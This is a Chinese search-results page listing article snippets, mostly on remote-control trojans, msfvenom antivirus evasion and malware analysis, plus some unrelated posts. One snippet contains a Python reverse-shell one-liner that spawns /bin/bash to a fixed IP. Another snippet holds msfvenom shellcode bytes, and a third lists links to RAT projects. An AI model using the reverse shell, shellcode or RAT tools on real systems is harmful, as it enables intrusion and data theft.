首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏Ms08067安全实验室

    免杀专题文章(2)-msfvenom隐藏的参数

    以下文章来源于Tide安全团队 ,作者重剑无锋 1、免杀专题文章(1)-基础篇: ---- 因为cobaltstrike生成payload比较简单,这里不再累述,只是介绍一下msfvenom的基本参数和一些小技巧 (2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为exe,-o选项指定输出的文件名为payload.exe,保存在根目录下 subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.211.55.2",3333));os.dup2( s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

    2.2K10发布于 2020-02-19
  • 来自专栏音视频咖

    5G创新与探索,超低时延的传输

    本期我们邀请了腾讯云音视频专家工程师——白松灵,为大家分享5G技术创新探索以及腾讯云在超低延时传输上的技术实践。 5G是当前的新趋势。 在矿山、冶金、港口以及开放道路等场景中,通过5G技术可以将实际操作的安全员从车上解放出来,实现真正的无人,甚至可以实现一名驾驶员控制多台车辆,解放更多人力成本。 支持P2P模式,能够实现内网穿透,不做数据转发,直接进行内网传输。 本系统可以支持Linux、ARM芯片或X86芯片,支持H264/H265编码等多种协议,并且实现了控制信令的同步传输。 未来我们将持续拓展更多的5G远程实时控制场景,让技术可以造福更多的行业。同时,我们也会持续致力于不断提升相关的性能与指标并探索更多的方式来增强的操控体验。

    2.9K30编辑于 2023-01-18
  • LySocket 远程ShellCode种植

    127.0.0.1 1763 Open 1 127.0.0.1 1806 Open 2 - 0 4 x64 System 1 124 x64 Registry 2

    1.3K20编辑于 2022-12-28
  • 来自专栏大侠之运维

    轻量化的工具

    广泛的用途:natpass可用于远程技术支持、服务器管理、远程开发、远程维护等各种用途,帮助用户更好地管理和控制计算机和服务器。 natpass的部署过程要使用natpass,您需要将其部署到服务器端、受控端和控制端。下面是针对debian系统的部署过程示例:服务器端部署在服务器上下载natpass,并将其解压到任意目录。 使用以下命令启动服务器端程序,使用sudo以管理员权限运行: sudo . (可选)修改local.yaml配置文件,将server地址设置为服务器端的地址。 修改方式如下:使用以下命令生成一个16位随机串: tr -dc A-Za-z0-9 < /dev/urandom | dd bs=16 count=1 2>/dev/null && echo修改服务器端的

    71210编辑于 2024-10-09
  • 来自专栏极安御信安全研究院

    木马病毒分析

    这是一套令牌提权的组合拳,返回上一层;这里是拿到句柄复制句柄; 3.7.2、sub_4066C0这边就开始和服务通信sub_401470:sub_401660:这里有一个开辟线程,进入回调函数发现,是和服务器链接

    1.1K21编辑于 2023-08-24
  • 来自专栏七夜安全博客

    Ares:基于Python的BS

    Ares 前言 本文介绍一个比较有意思的基于Python的远程控制工具Ares。 Ares采用B/S架构,基于Python2,Server端使用Flask进行开发,整体在浏览器就可以轻易操作。 第二节 优势与不足 这个使用Python开发的B/S,整体来说实现一个的基本功能。 优势: 跨平台,支持使用pyinstaller带包成二进制文件 使用http协议进行交互,防火墙不会拦截 不足: 使用py2开发,不兼容py3 并发性差 循环采用http询问,效率低下,容易被发现 http 数据域没有被加密,保密性差 打算对这个进行重写,基本规划是采用 python3+tornado+webSocket 技术进行开发,会开辟一个专题专门进行讲解开发过程,知识星球的朋友优先。

    1.9K30发布于 2018-06-26
  • 来自专栏Ms08067安全实验室

    红队作业 | 钉钉机器人服务器体验

    文章来源|MS08067 红队培训班 第5期 本文作者:thresh(红队培训班5期学员) 0x01 钉钉机器人 钉钉,阿里巴巴出品,专为全球企业组织打造的智能移动办公平台,含PC版,IPad和手机版 本次作业是使用钉钉机器人来实现服务器! 1、登录钉钉开放平台 可以先创建一个企业 选择应用开发,企业内部开发,添加一个机器人 记录生成的密钥 配置好开发管理,服务器出口IP添加VPS的地址,消息接收地址为一个可以接收数据的url,该url 验证不通过') print('有get请求') if __name__ == '__main__': app.run(host='0.0.0.0', port=9000) 3、在开发管理的服务器上启动服务 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run' --type DeleteValue --key 'shell' 0x04 总结 钉钉机器人的服务端

    2K20编辑于 2022-04-06
  • 来自专栏高性能服务器开发

    大灰狼木马源码分析

    大灰狼远程控制木马是一个较为常见的工具,不同的木马病毒团伙对其定制改造后发布了诸多变种。本章将从启动过程、通信协议、功能三个方面逆向分析该木马的实现原理。 配置信息 1: { "服务器IP地址", "服务器通信密码", 2110, 2110, "Mother360", "V_130305" }; 配置信息 2: { "YYYYYYYYYYYY 命令功能如表 16-2 所示。 16.5 功能分析 功能分析如代码清单 16-5 所示。 服务器管理代码分析如代码清单 16-13 所示。 有了对大灰狼木马的分析,读者可以根据病毒的实现原理,编写对应的修复、防御工具,制作针对大灰狼木马的专杀软件。 本文摘编自《C++反汇编与逆向分析技术揭秘(第2版)》,经出版方授权发布。

    7.5K40编辑于 2021-12-08
  • 来自专栏FreeBuf

    应急响应之大灰狼分析

    目标IP:139.159.227.182,使用微步对该IP进行分析,发现该IP服务器存在病毒样本数据,详细如下: ? 确认该信息后,使用杀软对系统进行病毒查杀,但并未发现异常: ? 对此不太甘心,因此做了一下操作: 在防火墙封锁该IP,禁止与互联网进行通信; 进入系统对进程信息进行分析,判断是否存在问题; 对外联流量的对象系统进行渗透; 第二章、大灰狼木马分析 使用process 1、sub_401ED8主要作用为对URL地址进行解密; 2、sub_401DEC主要作用为载入程序。 详细如下: ? sub_401C36 1、首先动态载入dll,并从kernel32.dll中获取CreateFileA函数地址; 2、将路径C:\Program Files\AppPatch与文件名dll进行拼接; 3

    2.3K20发布于 2020-08-17
  • 来自专栏FreeBuf

    当心,安卓(spynote)升级了……

    最近在某国外论坛上流出一款安卓spynote3.2版本,以前freebuf上有人发过spynots2.4版的,不过现在已经升级了,功能变得更加强大,危害更严重。 和以前的几个android相比(droidjack, android RAT, dendroid)相比,此次的更新亮点不多,只不过是对现在的安卓升级版本的跟进而已。 可以看到,和以往的一样,做好端口映射,定制图标,包名,版本号等等,还可以和别的apk文件捆绑,不过经测试好像有bug,并不能正常使用。生成带木马的apk文件,安装之后上线。 基本功能: 1、可以生成一个APK,绑定在被控手机的任何APP上 2、可在电脑端控制手机,包括浏览、传输、删除文件等 3、可进行SMS短信收发和查看功能 4、可以控制手机的电话功能 5、联系人管理 6、

    3.4K80发布于 2018-02-24
  • 来自专栏信息安全必修课

    使用kali msfvenom编写木马“实验”

    打开终端并输入以下命令:msfvenom -p [payload] LHOST=[IP地址] LPORT=[端口号] -f [格式] -o [文件名]

    2.7K51编辑于 2023-04-23
  • C++ Boost 实现异步IO

    Boost 利用ASIO框架实现一个跨平台的反向程序,该支持保存套接字,当有套接字连入时,自动存储到map容器,当客户下线时自动从map容器中移除,当我们需要与特定客户端通信时,只需要指定客户端

    1.3K20编辑于 2022-12-28
  • 来自专栏FreeBuf

    瞄准金融行业的木马:SpyNote

    上面都是共享 C&C 服务器的应用程序。 CypherRat 地下销售 该恶意软件家族的最新变种 SpyNote.C 在 Telegram 进行出售,且名为 CypherRat。 卓越的能力 SpyNote.C 恶意软件变种执行的独特功能,在 2022 年具有功能更的恶意软件中被识别出来。 equals(s)))) {accessibilityNodeInfo0.performAction(16);return true;}} (向右滑动,查看更多) 恶意软件通过摄像头录制视频并回传到 C&C 服务器 收到攻击者的命令后,攻击者的 C&C 服务器会收到从网页获取的凭据和信息。 social_creds.this.done = true;social_creds.this.finish();}}; (向右滑动,查看更多) 获取的敏感信息随后通过辅助功能服务接收来自攻击者的命令,然后传输到应用程序中硬编码的 C&C 服务器

    2.5K30编辑于 2023-02-10
  • 来自专栏kali blog

    Kage——msf可视化平台

    Kage,一个把msf变成可视化平台的工具。 项目地址 https://github.com/WayzDev/Kage/ 下载安装 点我下载哈~ 下载后,给予运行权限。

    1.5K10编辑于 2021-12-17
  • 来自专栏Ms08067安全实验室

    杂说---总有一款适合你

    你我相识,我们一同探索开源神器,如果喜欢小编,就赶紧关注我们, 让我们一起成长吧 部分图片 下面的图片展示了一部分的图片,里面包含了很多很多好玩有不错的事情。 ? ? ? ? 大集合列表 优秀神器大杂烩 https://github.com/quasar/QuasarRAT https://github.com/TheSph1nx/RT-101 https://github.com njRAT-v0.7d https://github.com/zerosum0x0/koadic 恶作剧型 https://github.com/NYAN-x-CAT/Lime-RAT 敲诈加密软件 手机 https://github.com/The404Hacking/AndroRAT 其他大集合 https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp https

    2.2K20发布于 2019-09-24
  • 来自专栏MicroPython

    TPYBoard v202 智能WIFI小车

    具体思路如下: 1、TPYBoard v202作为整个小车的核心控制部分,连接L298N电机驱动模块,实现小车的基本方向控制; 2、TPYBoard v202接入网络,开启Socket服务实现web服务器功能 .png 所需器件 - TPYBoard v202开发板 1块 - USB数据线(MicroUSB) 1条 - L298N电机驱动模块 1个 - 小车套件包(底板、电机等) 1个 - 18650电池 2节 cl.close() #关闭socket 硬件的连接 TPYBoard v202 L298N电机驱动 VIN +5V GND GND G5 IN1 G4 IN2 G13(MO) IN3 G12(MI) IN4 L298N电机驱动 两侧电机 OUT1 车头朝前 OUT2 右侧电机 OUT3 车头朝前 OUT4 左侧电机 注:电机不分正负极 网页效果 html.png 演示效果 `点击观看视频 <http://mpvideo.qpic.cn/0bf2hqaaeaaaveaa3ui5h5pfapgdai6aaaqa.f10002

    1.6K10发布于 2020-01-15
  • 来自专栏FreeBuf

    自己动手编写工具及检测思路

    PS:本文仅用于技术讨论与交流,严禁用于任何非法用途,违者后果自负 在学习攻击渗透的过程中,不免会接触工具。 现有的工具很多,从大名鼎鼎的冰河到CHAOS。 本文详细介绍了一款最小功能集的工具的实现细节,按照步骤动手实现,不仅可以对于工具的背后思路有了更深的体会,也可以巩固自己在多线程、网络编程等方面的知识。 服务端记录客户端连接流程 图2即是服务端记录客户端连接的流程。 六、检测思路 在对于这类工具进行检测时,重要的特征有以下两点: 1.注册表写入动作、复制自身动作 2.虽然与常用端口进行通信,但是数据包的特征却明显并非为对应协议的特征 精彩推荐

    95410编辑于 2023-04-26
  • 来自专栏网络安全技术点滴分享

    Mass-RAT系统分析

    系统概述 该系统是一个基于TCP Socket的远程文件管理系统,支持客户端与服务器之间的文件管理操作。 系统分为客户端和服务器两部分,客户端可以运行在Android和Windows平台上,服务器则运行在Windows平台上。客户端通过Socket与服务器通信,实现文件浏览、下载等操作。 Windows客户端:通过ClientSocket类与服务器通信,处理文件管理相关的请求。 服务器: Socket服务器:监听客户端连接,处理客户端的请求并返回相应的文件信息。 核心技术点 Socket通信: 客户端与服务器通过TCP Socket进行通信,使用Socket类进行数据传输。 服务器通过HandleFileManager类处理客户端的文件管理请求,并将结果返回给客户端。

    19210编辑于 2025-06-16
  • 来自专栏洛米唯熊

    免杀专题-shellcode免杀实践

    我们需要注意三点: 1.执行shellcode的命令必须放在dll的主函数“DllMain”中 2.我们需要新建一个线程运行shellcode 3.必须要有一个导出函数,函数里面的内容随意编写,没有影响 xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c \x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\ \x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" 会在工具所在目录下面生成如下图2个文件。 ? 然后我们点击劫持文件,在点击浏览选择刚才我们生成的dll,然后点击选择文件选择微信的程序,点击注入到导入表即可。 ?

    3.1K10发布于 2020-03-12
  • 来自专栏闪石星曜CyberSecurity

    自己动手编写工具及检测思路

    现有的工具很多,从大名鼎鼎的冰河到CHAOS。 本文详细介绍了一款最小功能集的工具的实现细节,按照步骤动手实现,不仅可以对于工具的背后思路有了更深的体会,也可以巩固自己在多线程、网络编程等方面的知识。 一、总体结构 ? 图2.服务端记录客户端连接流程 图2即是服务端记录客户端连接的流程。 由于我们的这款工具只是学习使用,所以不考虑绕过杀软的方法,使用写注册表的方式将自己设置为开机自启动: ? 六、检测思路 在对于这类工具进行检测时,重要的特征有以下两点: 1.注册表写入动作、复制自身动作 2.虽然与常用端口进行通信,但是数据包的特征却明显并非为对应协议的特征

    2.5K20发布于 2021-02-12
领券